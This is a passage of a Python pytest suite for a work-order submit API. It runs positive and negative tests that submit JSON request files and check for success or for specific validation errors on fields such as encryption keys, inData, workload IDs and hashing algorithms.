check_negative_test_responses(
result_response,
"Empty or Invalid data format for requesterNonce")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_signingalgorithm_alternate(self):
test_id = '18614'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_alternate_worker_signing_algorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_hashingalgorithm_alternate(self):
test_id = '18704'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_alternate_hashing_algorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_requesterprivatekey_no(self):
test_id = '18612'
request_file = os.path.join(
env.work_order_input_file,
"work_order_without_requester_private_key.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_params_twiceheartdisease(self):
test_id = '18811'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_twice_params.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_workloadid_invalid(self):
test_id = '18807'
request_file = os.path.join(
env.work_order_input_file,
"work_order_Submit_invalid_parameter_Workloadid.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Workload cannot be processed by this worker")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_methodname_list(self):
test_id = '18797'
request_file = os.path.join(
env.work_order_input_file,
"work_order_methodename_list.json")
# err_cd = \
# self.test_obj.setup_and_build_request_wo_submit(
# read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
read_json(request_file),
env.wo_submit_output_json_file_name,
read_json(request_file))
# result_response = self.test_obj.getresult(
# self.test_obj.build_request_output['request_obj'])
assert (
check_negative_test_responses(
submit_response,
"Invalid Request")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workerEncryptionKey_special_character(self):
test_id = '18732'
request_file = os.path.join(
env.work_order_input_file,
"work_order_workerEncryptionKey_special_character.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Empty or Invalid dataformat for workerEncryptionKey")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_sdk_workerEncryptionKey_special_character(self):
with pytest.raises(ValueError,
match="Encrypting Session key failed: Invalid session key or worker encryption key"):
test_id = '21228'
request_file = os.path.join(
env.work_order_input_file,
"work_order_workerEncryptionKey_special_character.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_workerencryptionkey_empty(self):
test_id = '18705'
request_file = os.path.join(
env.work_order_input_file,
"work_order_worker_encryption_key.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Empty or Invalid dataformat for workerEncryptionKey")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_sdk_workerencryptionkey_empty(self):
with pytest.raises(ValueError, match="Empty or Invalid dataformat for workerEncryptionKey"):
test_id = '21229'
request_file = os.path.join(
env.work_order_input_file,
"work_order_worker_encryption_key.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_dataencryptionalgorithm_alternate(self):
test_id = '18706'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_alternate_dataEncryption_algorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Unsupported dataEncryptionAlgorithm found in the request")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
def test_workordersubmit_indexindata_50(self):
test_id = '18707'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_50_index_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_index_orderchange(self):
test_id = '18708'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_changing_order_index.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_indata_empty(self):
test_id = '18765'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_empty_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Indata is empty")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk_1
@pytest.mark.negative
def test_workordersubmit_indata_remove(self):
test_id = '18766'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_no_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Missing parameter inData")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_outdata_empty(self):
test_id = '18711'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_empty_outdata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
# @pytest.mark.sdk (AttributeError: 'dict' object has no attribute 'to_jrpc_string)
def test_workordersubmit_indata_unknownparametervalue(self):
test_id = '18768'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_indata_unknown_parameter_value.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for in/out data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_index_negative(self):
test_id = '18769'
request_file = os.path.join(
env.work_order_input_file,
"work_order_negative_index.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indatahash_empty(self):
test_id = '18712'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_empty_indata_hash.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.negative
def test_workordersubmit_datahash_randomstr(self):
test_id = '18772'
request_file = os.path.join(
env.work_order_input_file,
"work_order_datahash_random_str.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for data hash of in data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_data_multipleechoresult(self):
test_id = '18774'
request_file = os.path.join(
env.work_order_input_file,
"work_order_multiple_data_echoresult.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_echoclient(self):
test_id = '18808'
request_file = os.path.join(
env.work_order_input_file,
"work_order_echoclient.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indata_alternatetextechoclient(self):
test_id = '18809'
request_file = os.path.join(
env.work_order_input_file,
"work_order_diff_text_data_indata_echoClient.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_indata_specialcharacter(self):
test_id = '18810'
request_file = os.path.join(
env.work_order_input_file,
"work_order_specialcharacter_data_single_index_indata.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
# @pytest.mark.sdk
def test_workordersubmit_iv_specialcharacterechoclient(self):
test_id = '18786'
request_file = os.path.join(
env.work_order_input_file,
"work_order_special_char_iv_echoresult.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for initialization vector of in data")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_requesterId_paramremove(self):
test_id = '18733'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_requesterId_param_remove.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Missing parameter requesterId")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.negative
def test_workordersubmit_responsetimeout_string(self):
test_id = '18798'
request_file = os.path.join(
env.work_order_input_file,
"work_order_with_response_timeout_str.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for responseTimeoutMSecs")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_dataencryptionalgorithm_list(self):
test_id = '18793'
request_file = os.path.join(
env.work_order_input_file,
"work_order_multiple_dataEncryptionAlgorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for dataEncryptionAlgorithm")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_sdk_dataencryptionalgorithm_list(self):
with pytest.raises(ValueError, match="Data Encryption Algorithm is not String"):
test_id = '18793'
request_file = os.path.join(
env.work_order_input_file,
"work_order_multiple_dataEncryptionAlgorithm.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.positive
def test_workordersubmit_workloadId_twoworkload(self):
test_id = '18805'
request_file = os.path.join(
env.work_order_input_file,
"work_order_two_workloadid.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.p1
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_workorderId_null(self):
test_id = '18717'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_WorkOrderId_null.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for work order id")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_workerId_nullstring(self):
test_id = '18718'
request_file = os.path.join(
env.work_order_input_file,
"workorder_workerId_null_number_randomString.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for Worker id")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_workloadId_specialcharacters(self):
test_id = '18730'
request_file = os.path.join(
env.work_order_input_file,
"work_order_workloadId_specialcharacters.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Workload cannot be processed by this worker")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.positive
def test_workordersubmit_encrypteddataencryptionkey_nullechoclient(self):
test_id = '18785'
request_file = os.path.join(
env.work_order_input_file,
"work_order_both_in_out_Data_EncryptionKey_null_echo.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_dataencryptionalgorithm_listsamealgotwice(self):
test_id = '18788'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_dataEncryptionAlgorithm_list_same_algo_twice.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
check_negative_test_responses(
result_response,
"Invalid data format for dataEncryptionAlgorithm")
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_sdk_dataencryptionalgorithm_listsamealgotwice(self):
with pytest.raises(ValueError, match="Data Encryption Algorithm is not String"):
test_id = '18788'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_dataEncryptionAlgorithm_list_same_algo_twice.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.set1
@pytest.mark.positive
def test_workordersubmit_encrypteddataencryptionkey_hyphenechoclient(self):
test_id = '20366'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_inData_outData_encryptedDataEncryptionKey_hyphen_echoClient.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.negative
def test_workordersubmit_encrypteddataencryptionkey_remove(self):
test_id = '18754'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_encryptedDataEncryptionKey_not_set_echoClient.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.set1
@pytest.mark.positive
def test_workordersubmit_encrypteddataencryptionkey_emptyechoclient(self):
test_id = '18806'
request_file = os.path.join(
env.work_order_input_file,
"work_order_submit_encryptedDataEncryptionKey_empty_echoClient.json")
err_cd = \
self.test_obj.setup_and_build_request_wo_submit(
read_json(request_file))
submit_response = submit_request(
self.test_obj.uri_client,
self.test_obj.build_request_output['request_obj'],
env.wo_submit_output_json_file_name,
read_json(request_file))
result_response = self.test_obj.getresult(
self.test_obj.build_request_output['request_obj'],
submit_response)
assert (
verify_test(
result_response, 0,
self.test_obj.build_request_output['pre_test_output'],
self.test_obj.build_request_output['action_obj'])
is ResultStatus.SUCCESS.value)
logger.info('\t\t!!! Test completed !!!\n\n')
@pytest.mark.workordersubmit
@pytest.mark.listener
@pytest.mark.sdk
@pytest.mark.fabric
@pytest.mark.ethereum
@pytest.mark.positive
def test_workordersubmit_outdata_success(self):
test_id = '18710'
request_file = os.path.join(
